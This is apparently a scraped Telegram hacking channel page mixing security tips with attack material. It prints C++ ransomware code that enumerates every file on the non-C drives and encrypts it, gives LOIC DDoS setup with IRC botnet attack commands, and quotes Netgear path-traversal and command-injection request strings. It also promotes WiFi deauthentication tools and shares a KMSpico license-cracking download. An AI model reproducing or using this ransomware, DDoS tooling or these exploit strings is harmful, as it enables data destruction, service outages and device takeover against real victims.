UNDERCODE COMMUNITY
2.68K subscribers
1.23K photos
31 videos
2.65K files
80.1K links
๐Ÿฆ‘ Undercode Cyber World!
@UndercodeCommunity


1๏ธโƒฃ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2๏ธโƒฃ Cyber & Tech NEWS:
@Undercode_News

3๏ธโƒฃ CVE @Daily_CVE

โœจ Web & Services:
โ†’ Undercode.help
Download Telegram
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘ Secure Yourself from Sensitive Data Exposure bug 2019 :
t.me/UndercOdeTesting

๐Ÿฆ‘ ๐•ƒ๐”ผ๐•‹๐•Š ๐•Š๐•‹๐”ธโ„๐•‹ :

E ncrypted data can be broken into due to weaknesses in:

1) Password hashing storages

2) Key generation process

3) mKey management

4) Protocol usage

5) Some other pointers:

6) Identify which data is sensitive according to privacy laws, regulatory requirements, or business needs.

7) Classify data processed, stored, or transmitted by an application.

8) Apply controls according to the classification.

9) Donโ€™t store sensitive data unnecessarily.

10) Discard data as soon as possible or use PCI DSS compliant tokenization or even truncation. Data that is not retained cannot be stolen.

11) Make sure to encrypt all sensitive data at rest.

12) Ensure up-to-date and strong standard algorithms, protocols, and keys are in place; use proper key management.

13) Encrypt all data in transit with secure protocols such as TLS with perfect forward secrecy (PFS) ciphers, cipher prioritization by the server, and secure parameters.

14) Enforce encryption using directives like HTTP Strict Transport Security (HSTS).

15) Disable caching for responses that contain sensitive data.

16) Ensure that stored passwords have a strong adaptive algorithm such as Argon2, scrypt, bcrypt, or PBKDF2.

17) Verify independently the effectiveness of your settings.


@UNDERCODEOFFICIAL
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘ How Prevent Broken Access Control :
t.me/UndercOdeTesting

1) Follow the Principle of Least Privilege, where the user should only have access to the minimum privileges that are necessary to perform actions.

2) Nothing more than what their role is intended to do.
Implement access control mechanisms once and re-use them throughout the application.

3) Model access controls should enforce record ownership, rather than accepting that the user can create, read, update or delete any record. For example, a user should only be able to modify or delete data that is their own. If I log in to an application, I should only be allowed to modify my data.

4) Domain access controls are unique to each application, but business limit requirements should be enforced by domain models.

5) Disable web server directory listing, and ensure file metadata such as git is not present within web roots.

6) Monitoring and logging are extremely important when access control fails the incident should be logged and send an alert to admins.

7) Use Rate limiting API and controller access to minimize the harm from automated attack tooling.

8) It is recommended for developers and QA engineers to include functional access control unit and integration tests.

@UNDERCODEOFFICIAL
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ€”โ€”โ€”โ€”โ€”๐–€๐–“D๐–Š๐–—๐•ฎ๐–”D๐–Š โ€”โ€”โ€”โ€”โ€”

๐Ÿฆ‘ WEBSITE HACKING
T.me/UndercodeTesting

๐Ÿฆ‘Installisation:

Clone :https://github.com/koutto/jok3r

1) Docker Image size
Pull Jok3r Docker Image:

> sudo docker pull koutto/jok3r

2) Run fresh Docker container:

> sudo docker run -i -t --name jok3r-container -w /root/jok3r -e

> DISPLAY=$DISPLAY -v /tmp/.X11-unix:/tmp/.X11-unix --shm-size 2g --net=host koutto/jok3

3) -e DISPLAY=$DISPLAY -v /tmp/.X11-unix:/tmp/.X11-unix is required in order to be able to start GUI applicationfrom the Docker container (e.g. open web browser to read reports). It requires running xhost +local:root on the host.

4) --shm-size 2g is used to increase the size of the shared memory, it is required to avoid crashs of web browser when reading reports from the Docker container.

--net=host is required to share host's interface. It is needed for reverse connections (e.g. Ping to container when testing for RCE, Getting a reverse shell)

5) To re-run a stopped container:

sudo docker start -i jok3r-container
To open multiple shells inside the container:

> sudo docker exec -it jok3r-container bash

๐Ÿฆ‘RUN:& USE

1) python3 jok3r.py info --services
Show security checks for a given service:

2) python3 jok3r.py info --checks <service>
Show supported attack profiles for a given service:

3) python3 jok3r.py info --attack-profiles <service>
Show supported products for all services:

4) python3 jok3r.py info --products

WRITTEN BY STEAVE(t.m)
โ€”โ€”โ€”โ€”โ€”-UNDER๐•ฎ๐–”D๐–Šโ€”โ€”โ€”โ€”-
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘ WHY UndercOde hackers and many others use and share Python More that otherlanguage programming ?

> Python is a universal language.

> He is one of the five most used on GitHub.

> The main code for the games World of Tanks, Battlefield 2, and Civilization 4 is written in Python.

> Intel, Cisco, and HP use this language to automate testing of software and web interfaces.

> Python is loved by developers and employees of Google, Facebook, Yandex.

> It speeds up scientific calculations and big data processing.
t.me/UndercodeTesting


โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘ Netgear Vulnerability Lastest @UndercOdeOfficial
> t.me/UndercOdeTesting

๐Ÿฆ‘ ๐•ƒ๐”ผ๐•‹๐•Š ๐•Š๐•‹๐”ธโ„๐•‹ :

1) Netgear routers have identified five vulnerabilities. Among other things, it was discovered that they can enter the web interface without authentication, which is present in 17 models of Netgear devices.

2) The problem is simple to operate and resembles a backdoor - to perform any operations in the web-interface it is enough to add the argument "& genie = 1" to the request URL and these operations will be performed without checking the authentication parameters.

3) Another vulnerability allows access to the contents of any files in the file systems of the device, including files with passwords and files on connected external USB-drives.

4) The problem is caused by the lack of checking resource access using indirect paths ("..") in the script genie_restoring.cgi, designed to recover the password. For example, to get the contents of the README.txt file from a mounted drive, you can send the request "http://192.168.1.1/genie_restoring.cgi?id=304966648" passing the arguments "id = 304966648 & next_file = cgi-bin /../ through the POST method. ./tmp/mnt/usb0/part1/README.txt ".

5) Other vulnerabilities are less dangerous, for example, one of the problems allows executing a code with root privileges on the device within two minutes after pressing the Wi-Fi Protected Setup button. Operation is performed through an attempt to connect devices with a name of the MR type "/ sbin / reboot" to the router.

6) A similar vulnerability allows arbitrary code to be executed on a device if it has access to the web interface (it can be used for CRSF attacks) by substituting commands in the device_name parameter (for example, "& device_name = A% 22 +% 26% 26 + touch +% 2Ftmp% 2Fjimmers +% 26% 26 + echo +% 22B ").

7) Netgear has already released a firmware update that urgently needs to be installed for all users of vulnerable devices.

8) He also recommends that you ensure that the web interface is accessible only from the internal network and is blocked for requests from the Internet.

9) It is noteworthy that information about the problems was transmitted to Netgear back in March last year, firmware updates with patches were published in the fall, and information about vulnerabilities was disclosed only now.

โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘More About Netgear: 2020 tool
> Python module for interacting with Netgear's Arlo camera system.
fb.com/UndercOdeTestingCompany

๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:

> pip install arlo

--or--

# Install from master branch
$ pip install git+https://github.com/jeffreydwalter/arlo

2) After installing all of the required libraries, you can import and use this library like so:

from arlo import Arlo

from datetime import timedelta, date
import datetime
import sys

USERNAME = 'user@example.com'
PASSWORD = 'supersecretpassword'

try:
# Instantiating the Arlo object automatically calls Login(), which returns an oAuth token that gets cached.
# Subsequent successful calls to login will update the oAuth token.
arlo = Arlo(USERNAME, PASSWORD)


thats all
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘ What is Tcp Flood ?
t.me/UnderCodeTesting

1) TCP SYN floods are one of the oldest yet still very popular Denial of Service (DoS) attacks.

2) The most common attack involves sending numerous SYN packets to the victim.

3) The attack in many cases will spoof the SRC IP meaning that the reply (SYN+ACK packet) will not come back to it.

4) The intention of this attack is overwhelm the session/connection tables of the targeted server or one of the network entities on the way (typically the firewall).

5) Servers need to open a state for each SYN packet that arrives and they store this state in tables that have limited size.

6) As big as this table may be it is easy to send sufficient amount of SYN packets that will fill the table, and once this happens the server starts to drop a new request, including legitimate ones. Similar effects can happen on a firewall which also has to process and invest in each SYN packet.

7) Unlike other TCP or application level attacks the attacker does not have to use a real IP; this is perhaps the biggest strength of the attack.

โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘ DDOS ATTACK LASTEST TOOL:
instagram.com/UndercOdeTestingCompany

๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:

<> For Linux :
Linux (Ubuntu / Debian / Fedora)
> Running with Wine :

1) Download latest LOIC and extract.
> https://github.com/NewEraCracker/LOIC

2) Open a terminal and type (without the parenthesis)

> โ€œsudo apt-get install wineโ€ and wait for it to finish.

3) Type โ€œwget http://www.kegel.com/wine/winetricksโ€.

4) Type โ€œsh winetricksโ€ and from the GUI select dotnet20, and install it.

5) Go to applications on your drop down and under Wine click on โ€œBrowse C: driveโ€ then move the extracted LOIC to c:

6) Now, go to the extracted file and right-click LOIC.exe and click properties.

7) Go to permissions tab and check the box โ€œAllow executing this file as programโ€.

8) Right click file again and under open application, select wine.

๐Ÿฆ‘Now usage P:

> HIVEMIND/HIDDEN MODE

1) HIVEMIND mode will connect your client to an IRC server so it can be controlled remotely. Think of this as a voluntary botnet. Please be aware that your client can potentially be made to do naughty things.

Note: It does NOT allow remote administration of your machine; it just providees control of LOIC itself.

If you want to start up in Hivemind mode, run something such as this:

> LOIC.exe /hivemind irc.server.address

> which will connect to irc://irc.server.adress:6667/loic

2) You can also specify a port and channel:

> LOIC.exe /hivemind irc.server.address 1234 #secret

> which will connect to irc://irc.server.adress:1234/secret

3) In order to run Hivemind Hidden mode, run something such as this:

> LOIC.exe /hidden /hivemind irc.server.address

4) which will connect to irc://irc.server.adress:6667/loic without any visible GUI.

> CONTROLLING LOIC FROM IRC

5) As an OP, Admin or Owner, set the channel topic or send a message such as the following:

> 0!lazor targetip=127.0.0.1 message=test_test port=80 method=tcp wait=false random=true

6) To start an attack, type:

!lazor start
or append "start" to the END of the topic:

!lazor targetip=127.0.0.1 message=test_test port=80 method=tcp wait=false random=true start

7) To reset LOIC's options back to their defaults:

!lazor default

8) To stop an attack:

!lazor stop

๐Ÿฆ‘Tested by UndercOde
for any doubt check same git link more usage or
feel free to ask us

โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘ How To SpeedUp my Windows :
t.me/UndercodeTesting

๐Ÿฆ‘ ๐•ƒ๐”ผ๐•‹๐•Š ๐•Š๐•‹๐”ธโ„๐•‹ :

A) Prevent programs from starting at system startup

1) on the computers of most Windows users there are a lot of applications that automatically start when the system is turned on. Basically, this is factory software installed by the manufacturer, and another, the autorun of which has not been canceled or it was deliberately turned on.

2) Particularly severely, a decrease in performance is felt precisely at computer startup, when it loads the desktop and at the same time tries to launch a host of other applications. This significantly slows down the operation of the device, therefore it is necessary to minimize the number of programs with autostart. You can disable the automatic start function using the Task Manager .

3) If you use Windows 7 or Windows XP, then msconfig will be a good utility for disabling autorun .

B)1) Use less applications at a time, reduce the load on RAM (RAM) to improve performance

2)Using several applications at the same time can increase your productivity if, for example, you are working as a designer and you need to open Adobe Photoshop with Adobe Illustrator at the same time, however this creates an additional load for your PC. In most cases, the processor (CPU) does not suffer as much as RAM (RAM), since RAM is the main resource used.

3)Try launching the Task Manager and monitor the memory usage in the Performance> Memory tab . If statistics show that programs are loading RAM, you can easily track the software guilty of this in the Processes tab , which will allow you to improve the performance of a Windows 10 device.

C ) Filling the system memory, respectively, slows down the computer. Adding more RAM is one of the options that can solve the issue of low performance, but this will require some financial costs. A less effective way to help slow down Windows 10 is to increase the size of the Paging File .

D) Check if your operating system is damaged

1) Damaged data can lead to the fact that your computer with Windows 10 will run extremely slowly, and in the worst cases, even crash.

2) One easy way to fix corrupted data on Windows 10 is to run a system file checker utility. It is likely that you are already familiar with it, if you had previously used it in attempts to restore your hard drive or USB drive. Fixing such damaged files can certainly speed up Windows 10.

3) How do I run the System File Checker (System File Checker) in Windows 10?

Use the command line for this and, opening it, enter the following command:

sfc / scannow

D ) Scan your PC for malware

E) Shutting down and restarting Windows is not even an option. It is a necessity.

Unfortunately, some users neglect this rule and their personal computers can be in an active state day and night, even if their owner is already sleeping for five hours, forgetting that his device also needs to โ€œShut Downโ€ or at least โ€œReboot

F) Make your Windows as ugly as possible.

Eliminate animations and all special effects.

Our modern PCs have an operating system in which the developers tried to make everything look great, was filled with various animations and effects, since this makes the process of working with the device much more pleasant. Everything good usually has a different side - these visual improvements consume system resources sometimes more than we would like. Not all PCs have powerful enough components to allow themselves to function effectively while maintaining all the visual amenities on the screen.

>My computer (right-click on the icon) > Properties> Advanced system settings> Settings (in the Performance section ).

In the Performance Options window, select Ensure the best performance If it doesnโ€™t suit you with something, you can always set User Preferences and enable / disable certain effects at will.

G) Make sure Windows always gets the latest updates

H) Turn off cloud sync to speed up Windows 10

I) Use Quick Start to Reduce Your Computerโ€™s Boot Time
One way to speed up the Windows 10 startup process is to enable the sleep mode feature, which is disabled by default. Quick start (enabled by default) is another feature that reduces the startup time of the operating system.

You can check if Quick Launch is enabled on your computer by choosing Power> Actions of the power buttons . Click Change settings that are currently unavailable to unlock the shutdown configuration. There you will see the ability to enable or disable the quick launch function.

Written by UndercOde For More or any doubt feel free to ask us
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘ If You have a rooted android don t missed this new tool one of the best wifi hacking :
t.me/UndercOdeTesting
> Aircrack, Airodump, Aireplay, MDK3 and Reaver GUI Application for Android

๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:

1) apk from :
https://github.com/chrisk44/Hijacker/releases
(official)

2) require rooted android 5+

๐Ÿฆ‘ FEATURES :

1) Information Gathering

2) View a list of access points and stations (clients) around you (even hidden ones)

3) View the activity of a specific network (by measuring beacons and data packets) and its clients

4) Statistics about access points and stations

5) See the manufacturer of a device (AP or station) from the OUI database

6) See the signal power of devices and filter the ones that are closer to you

7) Save captured packets in .cap file
Attacks

8) Deauthenticate all the clients of a network (either targeting each one (effective) or without specific target)

9) Deauthenticate a specific client from the network it's connected
MDK3 Beacon Flooding with custom options and SSID list
MDK3 Authentication DoS for a specific network or to every nearby AP

10) Capture a WPA handshake or gather IVs to crack a WEP network
Reaver WPS cracking (pixie-dust attack using NetHunter chroot and external adapter)

ENJOY
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘ What is Exactly a Hijacking attack ?
fb.com/UndercOdeTestingCompany

1) Hijacking is a type of network security attack in which the attacker takes control of a communication - just as an airplane hijacker takes control of a flight - between two entities and masquerades as one of them.

2) one type of hijacking (also known as a man in the middle attack), the perpetrator takes control of an established connection while it is in progress.

3) The attacker intercepts messages in a public key exchange and then retransmits them, substituting their own public key for the requested one, so that the two original parties still appear to be communicating with each other directly.

4) The attacker uses a program that appears to be the server to the client and appears to be the client to the server.

5) This attack may be used simply to gain access to the messages, or to enable the attacker to modify them before retransmitting them.

6) Another form of hijacking is browser hijacking, in which a user is taken to a different site than the one the user requested. There are two different types of domain name system (DNS) hijacking

โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘ Most Active Spyware 2019-2020 From All Reports
Instagram.com/UndercOdeTestingCompany

๐Ÿฆ‘ ๐•ƒ๐”ผ๐•‹๐•Š ๐•Š๐•‹๐”ธโ„๐•‹ :

1) Adware
Adware is a common type of spyware mainly used by advertisers. When you go online, it records your web surfing habits to gather information on the type of sites you search for. This information is used to direct marketing pop-ups and spam email.

2) Keyboard Logger
Keyboard logger spyware is a malicious program used by hackers. This program is designed to steal personal information by logging the actual keystrokes you type on your computer. When you enter a PIN, password, or credit card number the keyword logger records it for the hacker. This information can be used to access systems and commit identity theft and fraud.

3) Modem Hijacker
Modem hijackers tie into your phone line to make unauthorized calls and access member websites through your online connection. Usually this spyware program is used to phone premium rate phone numbers and access elicit websites such as porno sites. You don't know about the access and calls until you see the unauthorized charges on you bill.

4) Browser Hijacker
Browser hijacker spyware effects your Internet access by resetting your homepage and bookmarks. The goal is to direct you to undesirable sites with advertising spam. These programs are also data miners, recording your browsing activities and selling the information to advertisers.

5) Commercial Spyware
Not all spyware is unauthorized. In some cases, companies that provide free software and social networking platforms require you to agree to monitoring with spyware in order to access their systems. They then direct targeted advertising at you when you use their system. In this case you trade some of your privacy to access a free software.

@UndercOdeOfficial
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘ Ransoware the Cryptolocker 2019
t.me/iOsDeveloppers

๐Ÿฆ‘ ๐•ƒ๐”ผ๐•‹๐•Š ๐•Š๐•‹๐”ธโ„๐•‹ :

1) Strong AES Encryption. (Unbreakable)

2) Lockdown System Functionailty.

3) Multi-Thread Encryption.

4) Powerful Web Admin Interface

5) encrypt all file, lock down the system(pc) and send keys back to the server

๐Ÿฆ‘informations from :
https://github.com/ajayrandhawa/Cryptolocker

๐Ÿฆ‘ Getting all files from all drive to encrypting them:

Here is Visual C++ program get all list directory & files in drive and store path in text file for encryption later use.

> use Boost C++ libraries to get all files list. Please first setup Boost libraries to compile program.

#include <boost/config/warning_disable.hpp>
#include <boost/filesystem.hpp>
#include <iostream>
#include <iterator>
#include <stdio.h>
#include <windows.h>

using namespace std;

fstream out_file("data.txt", ios::out);

#define MAX 256

int main(int argc, char* argv[]) {

int dr_type = 99;
char dr_avail[MAX];
char *temp = dr_avail;

/* 1st we fill the buffer */
GetLogicalDriveStrings(MAX, dr_avail);
while (*temp != NULL) { // Split the buffer by null
dr_type = GetDriveType(temp);

char skip[10] = "C:\\";

if (dr_type == 3 && temp[0] != 'C') {

boost::system::error_code dir_error;

for (boost::filesystem::recursive_directory_iterator end, dir(temp, dir_error); dir != end; dir.increment(dir_error)) {
if (dir_error.value()) {
cerr << "Error accessing file: " << dir_error.message() << endl;
}
else {
cout << dir->path() << endl;
out_file << dir->path() << "\n";
}
}
}
temp += lstrlen(temp) + 1;
}
out_file.close();
system("pause");


2) Encrypt files :
Here firstly I get every file path from "data.txt" line by line and send to this crypy tool with type encryption and password. you can also embed all this program in upper loop for getting path and encrypting data recursively.

out_file.open("data.txt", ios::in);
string line;
while (out_file.good()) {
getline(out_file, line);
cout << line << endl;
std::string cmmd = "crpt.exe -e -p 4321 ";
cmmd += line;
system(cmmd.c_str());
}

3) Create Long String Complex Password Function:
Send length to function and function return complex long generated password which you can use for encryption.

string RandomString(int len)
{
srand(time(0));
string str = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
string newstr;
int pos;
while (newstr.size() != len) {
pos = ((rand() % (str.size() - 1)));
newstr += str.substr(pos, 1);
}
return newstr;
}

๐Ÿฆ‘This Popular Trick between hacker,
non-tested by undercOde

@UndercOdeOfficial
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
๐Ÿฆ‘ All Unstable-Termux Packages Termux updated 2020 from 1 h
install it via
> pkg install unstable-repo
Forwarded from U
12345
password
Forwarded from U
KMSpico.zip
3 MB
Official kms activator
Office /Windows
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘ Best free Webhost :
> t.me/UndercOdeTesting

๐Ÿฆ‘ ๐•ƒ๐”ผ๐•‹๐•Š ๐•Š๐•‹๐”ธโ„๐•‹ :

1) Localtunnel
(recommended by UndercOde)

> Localtunnel is a free tunneling solution, to host your local web applications over the cloud and access the app from the publicly accessible web url.

> npm install -g localtunnel

2) Once the installation is complete, you can simply create a tunnel as shown below, for any port that will forward the request to the locally hosted and running application.

> lt --port 3000

your url is: https://ordinary-parrot-7.localtunnel.me
The above url can be simply accessed to view the locally hosted app on port 3000 (i.e. the port for which the tunnel was actually created).

Specifying a subdomain for your tunnel is also possible, through the subdomain flag. This will allow you to have a custom sub-domain which will be easy to remember.

> lt --port 3000 --subdomain mynodejsapp

3) You will get the url for your subdomain as shown below (subject to the availability).

https://mynodejsapp.localtunnel.me

B) Serveo

C) Teleconsole

D) Pagekite

MOre..

@UndercOdeOfficial
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
This media is not supported in your browser
VIEW IN TELEGRAM
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘ Explanation of Linux permissions and ownership Part1 BY UndercOde
t.me/UndercOdeTesting

๐Ÿฆ‘ ๐•ƒ๐”ผ๐•‹๐•Š ๐•Š๐•‹๐”ธโ„๐•‹ :

> One user, one group-

1) let's take a look at the Linux permissions and ownership model. We have seen that each file belongs to a user and a group. This is the core of the permissions model in Linux. You can view the users and groups in the ls -l list:

$ ls -l / bin / bash

-rwxr-xr-x 1 root wheel 430540 Dec 23 18:27 / bin / bash In this particular example, / bin / The bash executable belongs to the root user and is in the wheel group.

2) The Linux permission model works by allowing three separate permission levels to be set for each file system objectโ€”they are the owner of the file, the group of files, and all other users.

Understanding "ls -l"

3) Let's take a look at our ls -l output and check the first column of this list:

$ ls -l / bin / bash-rwxr-xr-x 1 root wheel 430540 Dec 23 18:27 / bin / bash The first field -rwxr-xr-x contains a symbolic representation of the permissions of this special file. The first character (-) in this field specifies the type of the file, which in this case is a regular file. Other possible first characters are:

4) "d" directory "l" symbolic link "c" character special device file "b" block special device file "p" FIFO "s" socket three triples $ ls -l / bin / bash-rwxr-xr-x 1 root wheel 430540 Dec 23 18:27 / bin / bash The rest of this field consists of three triplet characters. The first triad represents the permissions of the file owner, the second represents the permissions of the file's group, and the third represents the permissions of all other users:

5) Above "rwx" "rx" "rx", r means allow reading (view data in file), w means allow writing (modify file and delete), and x means allow "execute" (run program). Putting all this information together, we can find that everyone can read the contents of the file and execute the file, but only the file owner (root user) is allowed to modify the file in any way. Therefore, although the average user can copy the file, only the root user is allowed to update or delete it.

Written by UndercOde
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–